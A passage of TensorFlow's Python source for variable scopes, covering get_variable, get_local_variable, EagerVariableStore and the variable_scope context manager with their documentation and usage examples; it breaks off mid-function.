# Graph-collection keys under which the per-graph variable store and the
# per-thread variable-scope store are stashed.
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)


class _VariableScopeStore(threading.local):
  """A thread local store for the current variable scope and scope counts."""

  def __init__(self):
    super(_VariableScopeStore, self).__init__()
    self.current_scope = VariableScope(False)
    self.variable_scopes_count = {}

  def open_variable_scope(self, scope_name):
    if scope_name in self.variable_scopes_count:
      self.variable_scopes_count[scope_name] += 1
    else:
      self.variable_scopes_count[scope_name] = 1

  def close_variable_subscopes(self, scope_name):
    for k in list(self.variable_scopes_count.keys()):
      if scope_name is None or k.startswith(scope_name + "/"):
        self.variable_scopes_count[k] = 0

  def variable_scope_count(self, scope_name):
    return self.variable_scopes_count.get(scope_name, 0)


def get_variable_scope_store():
  """Returns the variable scope store for current thread."""
  scope_store = ops.get_collection(_VARSCOPESTORE_KEY)

  if not scope_store:
    scope_store = _VariableScopeStore()
    ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
  else:
    scope_store = scope_store[0]

  return scope_store


@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
  """Returns the current variable scope."""
  return get_variable_scope_store().current_scope


def _get_default_variable_store():
  # Lazily create one _VariableStore per graph, cached in a collection.
  store = ops.get_collection(_VARSTORE_KEY)
  if store:
    return store[0]
  store = _VariableStore()
  ops.add_to_collection(_VARSTORE_KEY, store)
  return store


@tf_contextlib.contextmanager
def with_variable_store(store):
  # Temporarily swap the graph's variable store for `store`, restoring the
  # previous contents on exit (even on exception).
  store_collection = ops.get_collection_ref(_VARSTORE_KEY)
  old = list(store_collection)
  store_collection[:] = [store]
  try:
    yield
  finally:
    store_collection[:] = old


class EagerVariableStore(object):
  """Wrapper allowing functional layers to be used with eager execution.

  When eager execution is enabled Variables get deleted when they go out of
  scope, and are not stored in global collections by default. A lot of code
  (mostly the functional layers in tf.layers) assumes that variables are kept
  in a global list.

  EagerVariableStore can be used in conjunction with this code to make it
  eager-friendly. For example, to create a dense layer, use:

  ```
    container = tfe.EagerVariableStore()
    for input in dataset_iterator:
      with container.as_default():
        x = tf.layers.dense(input, name="l1")
    print(container.variables)  # Should print the variables used in the layer.
  ```
  """

  def __init__(self, store=None):
    if store is not None:
      if not store._store_eager_variables:  # pylint: disable=protected-access
        raise ValueError("Cannot construct EagerVariableStore from a "
                         "VariableStore object that does not hold eager "
                         "variables.")
      self._store = store
    else:
      self._store = _VariableStore()
    self._store._store_eager_variables = True  # pylint: disable=protected-access

  def as_default(self):
    return with_variable_store(self._store)

  def variables(self):
    return sorted(self._store._vars.values(), key=lambda x: x.name)  # pylint: disable=protected-access

  def trainable_variables(self):
    # pylint: disable=protected-access
    return sorted([x for x in self._store._vars.values() if x.trainable],
                  key=lambda x: x.name)
    # pylint: enable=protected-access

  def non_trainable_variables(self):
    # pylint: disable=protected-access
    return sorted([x for x in self._store._vars.values() if not x.trainable],
                  key=lambda x: x.name)
    # pylint: enable=protected-access

  def copy(self):
    """Copy this variable store and all of its contents.

    Variables contained in this store will be copied over to the new variable
    store, meaning that they can be modified without affecting the variables
    in this store.
    Returns:
      A new EagerVariableStore instance containing copied variables.
    """
    # pylint: disable=protected-access
    new_store = EagerVariableStore()
    for key, var in iteritems(self._store._vars):
      # Strip device out of variable name.
      try:
        index = var.name.index(":")
      except ValueError:
        stripped_var_name = var.name
      else:
        stripped_var_name = var.name[:index]
      # Create new variable with same value, name, and "trainable" flag.
      new_var = resource_variable_ops.ResourceVariable(
          var.read_value(), name=stripped_var_name, trainable=var.trainable)
      new_store._store._vars[key] = new_var
    return new_store
    # pylint: enable=protected-access


# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
                 shape=None,
                 dtype=None,
                 initializer=None,
                 regularizer=None,
                 trainable=None,
                 collections=None,
                 caching_device=None,
                 partitioner=None,
                 validate_shape=True,
                 use_resource=None,
                 custom_getter=None,
                 constraint=None,
                 synchronization=VariableSynchronization.AUTO,
                 aggregation=VariableAggregation.NONE):
  # Thin public wrapper: delegate to the current thread's VariableScope and
  # the default per-graph _VariableStore. Docstring attached below via the
  # shared get_variable_or_local_docstring template.
  return get_variable_scope().get_variable(
      _get_default_variable_store(),
      name,
      shape=shape,
      dtype=dtype,
      initializer=initializer,
      regularizer=regularizer,
      trainable=trainable,
      collections=collections,
      caching_device=caching_device,
      partitioner=partitioner,
      validate_shape=validate_shape,
      use_resource=use_resource,
      custom_getter=custom_getter,
      constraint=constraint,
      synchronization=synchronization,
      aggregation=aggregation)


# Runtime string template shared by get_variable and get_local_variable
# docstrings; %s slots are filled in by the __doc__ assignments below.
get_variable_or_local_docstring = ("""%s

%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:

```python
def foo():
  with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
    v = tf.get_variable("v", [1])
  return v

v1 = foo()  # Creates v.
v2 = foo()  # Gets the same, existing v.
assert v1 == v2
```

If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.

Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).

If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.

Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.

Args:
  name: The name of the new or existing variable.
  shape: Shape of the new or existing variable.
  dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
  initializer: Initializer for the variable if one is created. Can either be
    an initializer object or a Tensor. If it's a Tensor, its shape must be
    known unless validate_shape is False.
  regularizer: A (Tensor -> Tensor or None) function; the result of
    applying it on a newly created variable will be added to the collection
    `tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
  %scollections: List of graph collections keys to add the Variable to.
    Defaults to `[%s]` (see `tf.Variable`).
  caching_device: Optional device string or function describing where the
    Variable should be cached for reading. Defaults to the Variable's
    device. If not `None`, caches on another device. Typical use is to
    cache on the device where the Ops using the Variable reside, to
    deduplicate copying through `Switch` and other conditional statements.
  partitioner: Optional callable that accepts a fully defined `TensorShape`
    and `dtype` of the Variable to be created, and returns a list of
    partitions for each axis (currently only one axis can be partitioned).
  validate_shape: If False, allows the variable to be initialized with a
    value of unknown shape. If True, the default, the shape of initial_value
    must be known. For this to be used the initializer must be a Tensor and
    not an initializer object.
  use_resource: If False, creates a regular Variable. If true, creates an
    experimental ResourceVariable instead with well-defined semantics.
    Defaults to False (will later change to True). When eager execution is
    enabled this argument is always forced to be True.
  custom_getter: Callable that takes as a first argument the true getter, and
    allows overwriting the internal get_variable method.
    The signature of `custom_getter` should match that of this method,
    but the most future-proof version will allow for changes:
    `def custom_getter(getter, *args, **kwargs)`.  Direct access to
    all `get_variable` parameters is also allowed:
    `def custom_getter(getter, name, *args, **kwargs)`.  A simple identity
    custom getter that simply creates variables with modified names is:
    ```python
    def custom_getter(getter, name, *args, **kwargs):
      return getter(name + '_suffix', *args, **kwargs)
    ```
  constraint: An optional projection function to be applied to the variable
    after being updated by an `Optimizer` (e.g. used to implement norm
    constraints or value constraints for layer weights). The function must
    take as input the unprojected Tensor representing the value of the
    variable and return the Tensor for the projected value
    (which must have the same shape). Constraints are not safe to
    use when doing asynchronous distributed training.
  synchronization: Indicates when a distributed a variable will be
    aggregated. Accepted values are constants defined in the class
    `tf.VariableSynchronization`. By default the synchronization is set to
    `AUTO` and the current `DistributionStrategy` chooses
    when to synchronize. If `synchronization` is set to `ON_READ`,
    `trainable` must not be set to `True`.
  aggregation: Indicates how a distributed variable will be aggregated.
    Accepted values are constants defined in the class
    `tf.VariableAggregation`.

Returns:
  The created or existing `Variable` (or `PartitionedVariable`, if a
  partitioner was used).

Raises:
  ValueError: when creating a new variable and shape is not declared,
    when violating reuse during variable creation, or when `initializer` dtype
    and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
    "Gets an existing variable with these parameters or create a new one.",
    "",
    "trainable: If `True` also add the variable to the graph collection\n"
    "    `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n  ",
    "GraphKeys.GLOBAL_VARIABLES")


# The argument list for get_local_variable must match arguments to
# get_variable. So, if you are updating the arguments, also update arguments
# to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable(  # pylint: disable=missing-docstring
    name,
    shape=None,
    dtype=None,
    initializer=None,
    regularizer=None,
    trainable=False,  # pylint: disable=unused-argument
    collections=None,
    caching_device=None,
    partitioner=None,
    validate_shape=True,
    use_resource=None,
    custom_getter=None,
    constraint=None,
    synchronization=VariableSynchronization.AUTO,
    aggregation=VariableAggregation.NONE):
  # Thin wrapper over `get_variable` that forces membership in the
  # LOCAL_VARIABLES collection and hard-codes trainable=False in the
  # forwarded call.  The `trainable` parameter exists only so this argument
  # list stays in sync with `get_variable` (see comment above); its value is
  # ignored.
  if collections:
    collections += [ops.GraphKeys.LOCAL_VARIABLES]
  else:
    collections = [ops.GraphKeys.LOCAL_VARIABLES]
  return get_variable(
      name,
      shape=shape,
      dtype=dtype,
      initializer=initializer,
      regularizer=regularizer,
      trainable=False,
      collections=collections,
      caching_device=caching_device,
      partitioner=partitioner,
      validate_shape=validate_shape,
      use_resource=use_resource,
      synchronization=synchronization,
      aggregation=aggregation,
      custom_getter=custom_getter,
      constraint=constraint)


# Fill in the docstring from the shared template so that get_variable and
# get_local_variable stay documented identically except for the noted deltas.
get_local_variable.__doc__ = get_variable_or_local_docstring % (
    "Gets an existing *local* variable or creates a new one.",
    "Behavior is the same as in `get_variable`, except that variables are\n"
    "added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
    "`False`.\n",
    "",
    "GraphKeys.LOCAL_VARIABLES")


def _get_partitioned_variable(name,
                              shape=None,
                              dtype=None,
                              initializer=None,
                              regularizer=None,
                              trainable=True,
                              collections=None,
                              caching_device=None,
                              partitioner=None,
                              validate_shape=True,
                              use_resource=None,
                              constraint=None):
  """Gets or creates a sharded variable list with these parameters.

  The `partitioner` must be a callable that accepts a fully defined
  `TensorShape` and returns a sequence of integers (the `partitions`).
  These integers describe how to partition the given sharded `Variable`
  along the given dimension. That is, `partitions[1] = 3` means split
  the `Variable` into 3 shards along dimension 1. Currently, sharding
  along only one axis is supported.

  If the list of variables with the given name (prefix) is already stored,
  we return the stored variables. Otherwise, we create a new one.

  If initializer is `None` (the default), the default initializer passed in
  the constructor is used. If that one is `None` too, we use a new
  `glorot_uniform_initializer`. If initializer is a Tensor, we use it as a
  value and derive the shape from the initializer.

  If the initializer is a callable, then it will be called for each shard.
  Otherwise the initializer should match the shape of the entire sharded
  Variable, and it will be sliced accordingly for each shard.

  Some useful partitioners are available. See, e.g.,
  `variable_axis_size_partitioner` and `min_max_variable_partitioner`.

  Args:
    name: The name of the new or existing variable.
    shape: Shape of the new or existing variable.
    dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
    initializer: Initializer for the variable if one is created.
    regularizer: A (Tensor -> Tensor or None) function; the result of applying
      it on a newly created variable will be added to the collection
      GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
    trainable: If `True` also add the variable to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    collections: List of graph collections keys to add the Variable to.
      Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
    caching_device: Optional device string or function describing where the
      Variable should be cached for reading. Defaults to the Variable's
      device. If not `None`, caches on another device. Typical use is to
      cache on the device where the Ops using the Variable reside, to
      deduplicate copying through `Switch` and other conditional statements.
    partitioner: Optional callable that accepts a fully defined `TensorShape`
      and `dtype` of the Variable to be created, and returns a list of
      partitions for each axis (currently only one axis can be partitioned).
    validate_shape: If False, allows the variable to be initialized with a
      value of unknown shape. If True, the default, the shape of
      initial_value must be known.
    use_resource: If False, creates a regular Variable. If True, creates an
      experimental ResourceVariable instead which has well-defined semantics.
      Defaults to False (will later change to True).
    constraint: An optional projection function to be applied to the variable
      after being updated by an `Optimizer` (e.g. used to implement norm
      constraints or value constraints for layer weights). The function must
      take as input the unprojected Tensor representing the value of the
      variable and return the Tensor for the projected value (which must have
      the same shape). Constraints are not safe to use when doing
      asynchronous distributed training.

  Returns:
    A tuple `(shards, partitions)` where `shards` is the list of `Variable`
    shards and `partitions` is the output of the partitioner on the input
    shape.

  Raises:
    ValueError: when creating a new variable and shape is not declared,
      or when violating reuse during variable creation. Reuse is set inside
      `variable_scope`.
  """
  # pylint: disable=protected-access
  scope = get_variable_scope()
  # Custom getters are incompatible with this private entry point because the
  # getter would be bypassed for the individual shards.
  if scope.custom_getter is not None:
    raise ValueError(
        "Private access to _get_partitioned_variable is not allowed when "
        "a custom getter is set. Current custom getter: %s. "
        "It is likely that you're using create_partitioned_variables. "
        "If so, consider instead using get_variable with a non-empty "
        "partitioner parameter instead." % scope.custom_getter)
  return scope._get_partitioned_variable(
      _get_default_variable_store(),
      name,
      shape=shape,
      dtype=dtype,
      initializer=initializer,
      regularizer=regularizer,
      trainable=trainable,
      collections=collections,
      caching_device=caching_device,
      partitioner=partitioner,
      validate_shape=validate_shape,
      use_resource=use_resource,
      constraint=constraint)
  # pylint: enable=protected-access


# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object):  # pylint: disable=invalid-name
  """A context for the variable_scope, see `variable_scope` for docs."""

  def __init__(self,
               name_or_scope,
               reuse=None,
               initializer=None,
               regularizer=None,
               caching_device=None,
               partitioner=None,
               custom_getter=None,
               old_name_scope=None,
               dtype=dtypes.float32,
               use_resource=None,
               constraint=None):
    """Creates a context for the variable_scope, see `variable_scope` for docs.

    Note: this does not create a name scope.

    Args:
      name_or_scope: `string` or `VariableScope`: the scope to open.
      reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the
        parent scope's reuse flag.
      initializer: default initializer for variables within this scope.
      regularizer: default regularizer for variables within this scope.
      caching_device: default caching device for variables within this scope.
      partitioner: default partitioner for variables within this scope.
      custom_getter: default custom getter for variables within this scope.
      old_name_scope: the original name scope when re-entering a
        variable scope.
      dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
      use_resource: If False, variables in this scope will be regular
        Variables. If True, experimental ResourceVariables will be created
        instead, with well-defined semantics. Defaults to False (will later
        change to True).
      constraint: An optional projection function to be applied to the
        variable after being updated by an `Optimizer` (e.g. used to
        implement norm constraints or value constraints for layer weights).
        The function must take as input the unprojected Tensor representing
        the value of the variable and return the Tensor for the projected
        value (which must have the same shape). Constraints are not safe to
        use when doing asynchronous distributed training.
    """
    self._name_or_scope = name_or_scope
    self._reuse = reuse
    self._initializer = initializer
    self._regularizer = regularizer
    self._caching_device = caching_device
    self._partitioner = partitioner
    self._custom_getter = custom_getter
    self._old_name_scope = old_name_scope
    self._dtype = dtype
    self._use_resource = use_resource
    self._constraint = constraint
    self._var_store = _get_default_variable_store()
    self._var_scope_store = get_variable_scope_store()
    if isinstance(self._name_or_scope, VariableScope):
      self._new_name = self._name_or_scope.name
      name_scope = self._name_or_scope._name_scope  # pylint: disable=protected-access
      # Handler for the case when we jump to a shared scope.  We create a new
      # VariableScope (self._var_scope_object) that contains a copy of the
      # provided shared scope, possibly with changed reuse and initializer, if
      # the user requested this.
      variable_scope_object = VariableScope(
          self._name_or_scope.reuse if not self._reuse else self._reuse,
          name=self._new_name,
          initializer=self._name_or_scope.initializer,
          regularizer=self._name_or_scope.regularizer,
          caching_device=self._name_or_scope.caching_device,
          partitioner=self._name_or_scope.partitioner,
          dtype=self._name_or_scope.dtype,
          custom_getter=self._name_or_scope.custom_getter,
          name_scope=name_scope,
          use_resource=self._name_or_scope.use_resource,
          constraint=self._constraint)
      # Explicit keyword overrides win over the values copied from the
      # shared scope.
      if self._initializer is not None:
        variable_scope_object.set_initializer(self._initializer)
      if self._regularizer is not None:
        variable_scope_object.set_regularizer(self._regularizer)
      if self._caching_device is not None:
        variable_scope_object.set_caching_device(self._caching_device)
      if self._partitioner is not None:
        variable_scope_object.set_partitioner(self._partitioner)
      if self._custom_getter is not None:
        # Chain the new custom getter on top of the shared scope's getter so
        # both run (new one outermost).
        variable_scope_object.set_custom_getter(
            _maybe_wrap_custom_getter(self._custom_getter,
                                      self._name_or_scope.custom_getter))
      if self._dtype is not None:
        variable_scope_object.set_dtype(self._dtype)
      if self._use_resource is not None:
        variable_scope_object.set_use_resource(self._use_resource)
      self._cached_variable_scope_object = variable_scope_object

  def __enter__(self):
    """Begins the scope block.

    Returns:
      A VariableScope.

    Raises:
      ValueError: when trying to reuse within a create scope, or create within
        a reuse scope, or if reuse is not `None` or `True`.
      TypeError: when the types of some arguments are not appropriate.
    """
    self._old = self._var_scope_store.current_scope
    if isinstance(self._name_or_scope, VariableScope):
      self._var_scope_store.open_variable_scope(self._new_name)
      # Snapshot sub-scope counters so __exit__ can restore them when we jump
      # out of a re-entered (non-prolonged) scope.
      self._old_subscopes = copy.copy(
          self._var_scope_store.variable_scopes_count)
      variable_scope_object = self._cached_variable_scope_object
    else:
      # Handler for the case when we just prolong current variable scope.
      # VariableScope with name extended by the provided one, and inherited
      # reuse and initializer (except if the user provided values to set).
      self._new_name = (
          self._old.name + "/" +
          self._name_or_scope if self._old.name else self._name_or_scope)
      self._reuse = (self._reuse or
                     self._old.reuse)  # Re-using is inherited by sub-scopes.
      if self._old_name_scope is None:
        name_scope = self._name_or_scope
      else:
        name_scope = self._old_name_scope
      variable_scope_object = VariableScope(
          self._reuse,
          name=self._new_name,
          initializer=self._old.initializer,
          regularizer=self._old.regularizer,
          caching_device=self._old.caching_device,
          partitioner=self._old.partitioner,
          dtype=self._old.dtype,
          use_resource=self._old.use_resource,
          custom_getter=self._old.custom_getter,
          name_scope=name_scope,
          constraint=self._constraint)
      if self._initializer is not None:
        variable_scope_object.set_initializer(self._initializer)
      if self._regularizer is not None:
        variable_scope_object.set_regularizer(self._regularizer)
      if self._caching_device is not None:
        variable_scope_object.set_caching_device(self._caching_device)
      if self._partitioner is not None:
        variable_scope_object.set_partitioner(self._partitioner)
      if self._custom_getter is not None:
        variable_scope_object.set_custom_getter(
            _maybe_wrap_custom_getter(self._custom_getter,
                                      self._old.custom_getter))
      if self._dtype is not None:
        variable_scope_object.set_dtype(self._dtype)
      if self._use_resource is not None:
        variable_scope_object.set_use_resource(self._use_resource)
      self._var_scope_store.open_variable_scope(self._new_name)
    self._var_scope_store.current_scope = variable_scope_object
    return variable_scope_object

  def __exit__(self, type_arg, value_arg, traceback_arg):
    # If jumping out from a non-prolonged scope, restore counts.
    if isinstance(self._name_or_scope, VariableScope):
      self._var_scope_store.variable_scopes_count = self._old_subscopes
    else:
      self._var_scope_store.close_variable_subscopes(self._new_name)
    self._var_scope_store.current_scope = self._old


def _maybe_wrap_custom_getter(custom_getter, old_getter):
  """Wrap a call to a custom_getter to use the old_getter internally."""
  if old_getter is None:
    return custom_getter

  # The new custom_getter should call the old one
  def wrapped_custom_getter(getter, *args, **kwargs):
    # Call:
    #  custom_getter(
    #    lambda: old_getter(true_getter, ...), *args, **kwargs)
    # which means custom_getter will call old_getter, which
    # will call the true_getter, perform any intermediate
    # processing, and return the results to the current
    # getter, which will also perform additional processing.
    return custom_getter(functools.partial(old_getter, getter), *args,
                         **kwargs)

  return wrapped_custom_getter


def _get_unique_variable_scope(prefix):
  """Get a name with the given prefix unique in the current variable scope."""
  var_scope_store = get_variable_scope_store()
  current_scope = get_variable_scope()
  name = current_scope.name + "/" + prefix if current_scope.name else prefix
  if var_scope_store.variable_scope_count(name) == 0:
    return prefix
  # Probe suffixes _1, _2, ... until an unused name is found.
  idx = 1
  while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
    idx += 1
  return prefix + ("_%d" % idx)


# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"])  # pylint: disable=invalid-name
class variable_scope(object):
  """A context manager for defining ops that creates variables (layers).

  This context manager validates that the (optional) `values` are from the
  same graph, ensures that graph is the default graph, and pushes a name
  scope and a variable scope.

  If `name_or_scope` is not None, it is used as is. If `name_or_scope` is
  None, then `default_name` is used. In that case, if the same name has been
  previously used in the same scope, it will be made unique by appending
  `_N` to it.

  Variable scope allows you to create new variables and to share already
  created ones while providing checks to not create or share by accident.
  For details, see the
  [Variable Scope How To](https://tensorflow.org/guide/variables), here we
  present only a few basic examples.

  Simple example of how to create a new variable:

  ```python
  with tf.variable_scope("foo"):
      with tf.variable_scope("bar"):
          v = tf.get_variable("v", [1])
          assert v.name == "foo/bar/v:0"
  ```

  Simple example of how to reenter a premade variable scope safely:

  ```python
  with tf.variable_scope("foo") as vs:
    pass

  # Re-enter the variable scope.
  with tf.variable_scope(vs, auxiliary_name_scope=False) as vs1:
    # Restore the original name_scope.
    with tf.name_scope(vs1.original_name_scope):
        v = tf.get_variable("v", [1])
        assert v.name == "foo/v:0"
        c = tf.constant([1], name="c")
        assert c.name == "foo/c:0"
  ```

  Basic example of sharing a variable AUTO_REUSE:

  ```python
  def foo():
    with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
      v = tf.get_variable("v", [1])
    return v

  v1 = foo()  # Creates v.
  v2 = foo()  # Gets the same, existing v.
  assert v1 == v2
  ```

  Basic example of sharing a variable with reuse=True:

  ```python
  with tf.variable_scope("foo"):
      v = tf.get_variable("v", [1])
  with tf.variable_scope("foo", reuse=True):
      v1 = tf.get_variable("v", [1])
  assert v1 == v
  ```

  Sharing a variable by capturing a scope and setting reuse:

  ```python
  with tf.variable_scope("foo") as scope:
      v = tf.get_variable("v", [1])
      scope.reuse_variables()
      v1 = tf.get_variable("v", [1])
  assert v1 == v
  ```

  To prevent accidental sharing of variables, we raise an exception when
  getting an existing variable in a non-reusing scope.

  ```python
  with tf.variable_scope("foo"):
      v = tf.get_variable("v", [1])
      v1 = tf.get_variable("v", [1])
      #  Raises ValueError("... v already exists ...").
  ```

  Similarly, we raise an exception when trying to get a variable that does
  not exist in reuse mode.

  ```python
  with tf.variable_scope("foo", reuse=True):
      v = tf.get_variable("v", [1])
      #  Raises ValueError("... v does not exists ...").
  ```

  Note that the `reuse` flag is inherited: if we open a reusing scope, then
  all its sub-scopes become reusing as well.

  A note about name scoping: Setting `reuse` does not impact the naming of
  other ops such as mult. See related discussion on
  [github#6189](https://github.com/tensorflow/tensorflow/issues/6189)

  Note that up to and including version 1.0, it was allowed (though
  explicitly discouraged) to pass False to the reuse argument, yielding
  undocumented behaviour slightly different from None. Starting at 1.1.0
  passing None and False as reuse has exactly the same effect.

  A note about using variable scopes in multi-threaded environment: Variable
  scopes are thread local, so one thread will not see another thread's
  current scope. Also, when using `default_name`, unique scopes names are
  also generated only on a per thread basis. If the same name was used
  within a different thread, that doesn't prevent a new thread from creating
  the same scope. However, the underlying variable store is shared across
  threads (within the same graph). As such, if another thread tries to
  create a new variable with the same name as a variable created by a
  previous thread, it will fail unless reuse is True.

  Further, each thread starts with an empty variable scope. So if you wish
  to preserve name prefixes from a scope from the main thread, you should
  capture the main thread's scope and re-enter it in each thread. For e.g.

  ```
  main_thread_scope = variable_scope.get_variable_scope()

  # Thread's target function:
  def thread_target_fn(captured_scope):
    with variable_scope.variable_scope(captured_scope):
      # .... regular code for this thread

  thread = threading.Thread(target=thread_target_fn,
                            args=(main_thread_scope,))
  ```
  """

  def __init__(self,
               name_or_scope,
               default_name=None,
               values=None,
               initializer=None,
               regularizer=None,
               caching_device=None,
               partitioner=None,
               custom_getter=None,
               reuse=None,
               dtype=None,
               use_resource=None,
               constraint=None,
               auxiliary_name_scope=True):
    """Initialize the context manager.

    Args:
      name_or_scope: `string` or `VariableScope`: the scope to open.
      default_name: The default name to use if the `name_or_scope` argument
        is `None`, this name will be uniquified. If name_or_scope is provided
        it won't be used and therefore it is not required and can be None.
      values: The list of `Tensor` arguments that are passed to the op
        function.
      initializer: default initializer for variables within this scope.
      regularizer: default regularizer for variables within this scope.
      caching_device: default caching device for variables within this scope.
      partitioner: default partitioner for variables within this scope.
      custom_getter: default custom getter for variables within this scope.
      reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
        for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
        variables if they do not exist, and return them otherwise; if None,
        we inherit the parent scope's reuse flag. When eager execution is
        enabled, new variables are always created unless an
        EagerVariableStore or template is currently active.
      dtype: type of variables created in this scope (defaults to the type
        in the passed scope, or inherited from parent scope).
      use_resource: If False, all variables will be regular Variables. If
        True, experimental ResourceVariables with well-defined semantics
        will be used instead. Defaults to False (will later change to True).
        When eager execution is enabled this argument is always forced to
        be True.
      constraint: An optional projection function to be applied to the
        variable after being updated by an `Optimizer` (e.g. used to
        implement norm constraints or value constraints for layer weights).
        The function must take as input the unprojected Tensor representing
        the value of the variable and return the Tensor for the projected
        value (which must have the same shape). Constraints are not safe to
        use when doing asynchronous distributed training.
      auxiliary_name_scope: If `True`, we create an auxiliary name scope with
        the scope. If `False`, we don't create it. Note that the argument is
        not inherited, and it only takes effect for once when creating. You
        should only use it for re-entering a premade variable scope.

    Returns:
      A scope that can be captured and reused.

    Raises:
      ValueError: when trying to reuse within a create scope, or create
        within a reuse scope.
      TypeError: when the types of some arguments are not appropriate.
    """
    self._name_or_scope = name_or_scope
    self._default_name = default_name
    self._values = values
    self._initializer = initializer
    self._regularizer = regularizer
    self._caching_device = caching_device
    self._partitioner = partitioner
    self._custom_getter = custom_getter
    self._reuse = reuse
    self._dtype = dtype
    self._use_resource = use_resource
    self._constraint = constraint
    if self._default_name is None and self._name_or_scope is None:
      raise TypeError("If default_name is None then name_or_scope is required")
    if self._reuse is False:
      # We don't allow non-inheriting scopes, False = None here.
      self._reuse = None
    if not (self._reuse is True
            or self._reuse is None
            or self._reuse is AUTO_REUSE):
      raise ValueError("The reuse parameter must be True or False or None.")
    if self._values is None:
      self._values = []
    self._in_graph_mode = not context.executing_eagerly()
    if self._in_graph_mode:
      self._graph = ops._get_graph_from_inputs(self._values)  # pylint: disable=protected-access
    self._cached_pure_variable_scope = None
    self._current_name_scope = None
    if not isinstance(auxiliary_name_scope, bool):
      raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
                      "while get {}".format(auxiliary_name_scope))
    self._auxiliary_name_scope = auxiliary_name_scope

  def __enter__(self):
    # If the default graph is building a function, then we should not replace it
    # with the cached graph.
    if ops.get_default_graph().building_function:
      self._building_function = True
    else:
      self._building_function = False
    if self._in_graph_mode and not self._building_function:
      self._graph_context_manager = self._graph.as_default()
      self._graph_context_manager.__enter__()
    if self._cached_pure_variable_scope is not None:
      # Fast path for re-entering variable_scopes. We've held on to the pure
      # variable scope from a previous successful __enter__, so we avoid some
      # overhead by re-using that object.
      if self._current_name_scope is not None:
        self._current_name_scope.__enter__()
      return self._cached_pure_variable_scope.__enter__()

    try:
      return self._enter_scope_uncached()
    except:
      # NOTE(review): `self._graph_context_manager` is only assigned above
      # when `self._in_graph_mode and not self._building_function`; on the
      # eager / function-building paths this attribute read would raise
      # AttributeError instead of re-raising the original error — TODO
      # confirm and consider initializing it to None in __init__.
      if self._graph_context_manager is not None:
        self._graph_context_manager.__exit__(*sys.exc_info())
      raise

  def _enter_scope_uncached(self):
    """Enters the context manager when there is no cached scope yet.

    Returns:
      The entered variable scope.

    Raises:
      TypeError: A wrong type is passed as `scope` at __init__().
      ValueError: `reuse` is incorrectly set at __init__().
    """
    if self._auxiliary_name_scope:
      # Create a new name scope later
      current_name_scope = None
    else:
      # Reenter the current name scope
      name_scope = ops.get_name_scope()
      if name_scope:
        # Hack to reenter
        name_scope += "/"
        current_name_scope = ops.name_scope(name_scope)
      else:
        # Root scope
        current_name_scope = ops.name_scope(name_scope)

    # IMPORTANT: Only assign to self._cached_pure_variable_scope and
    # self._current_name_scope after successful __enter__() calls.
    if self._name_or_scope is not None:
      if not isinstance(self._name_or_scope,
                        (VariableScope,) + six.string_types):
        raise TypeError("VariableScope: name_or_scope must be a string or "
                        "VariableScope.")
      if isinstance(self._name_or_scope, six.string_types):
        name_scope = self._name_or_scope
      else:
        name_scope = self._name_or_scope.name.split("/")[-1]
      if name_scope or current_name_scope:
        current_name_scope = current_name_scope or ops.name_scope(name_scope)
        try:
          current_name_scope_name = current_name_scope.__enter__()
        except:
          current_name_scope.__exit__(*sys.exc_info())
          raise
        self._current_name_scope = current_name_scope
        if isinstance(self._name_or_scope, six.string_types):
          old_name_scope = current_name_scope_name
        else:
          old_name_scope = self._name_or_scope.original_name_scope
        pure_variable_scope = _pure_variable_scope(
            self._name_or_scope,
            reuse=self._reuse,
            initializer=self._initializer,
            regularizer=self._regularizer,
            caching_device=self._caching_device,
            partitioner=self._partitioner,
            custom_getter=self._custom_getter,
            old_name_scope=old_name_scope,
            dtype=self._dtype,
            use_resource=self._use_resource,
            constraint=self._constraint)
        try:
          entered_pure_variable_scope = pure_variable_scope.__enter__()
        except:
          pure_variable_scope.__exit__(*sys.exc_info())
          raise
        self._cached_pure_variable_scope = pure_variable_scope
        return entered_pure_variable_scope
      else:
        self._current_name_scope = None
        # This can only happen if someone is entering the root variable scope.
        pure_variable_scope = _pure_variable_scope(
            self._name_or_scope,
            reuse=self._reuse,
            initializer=self._initializer,
            regularizer=self._regularizer,
            caching_device=self._caching_device,
            partitioner=self._partitioner,
            custom_getter=self._custom_getter,
            dtype=self._dtype,
            use_resource=self._use_resource,
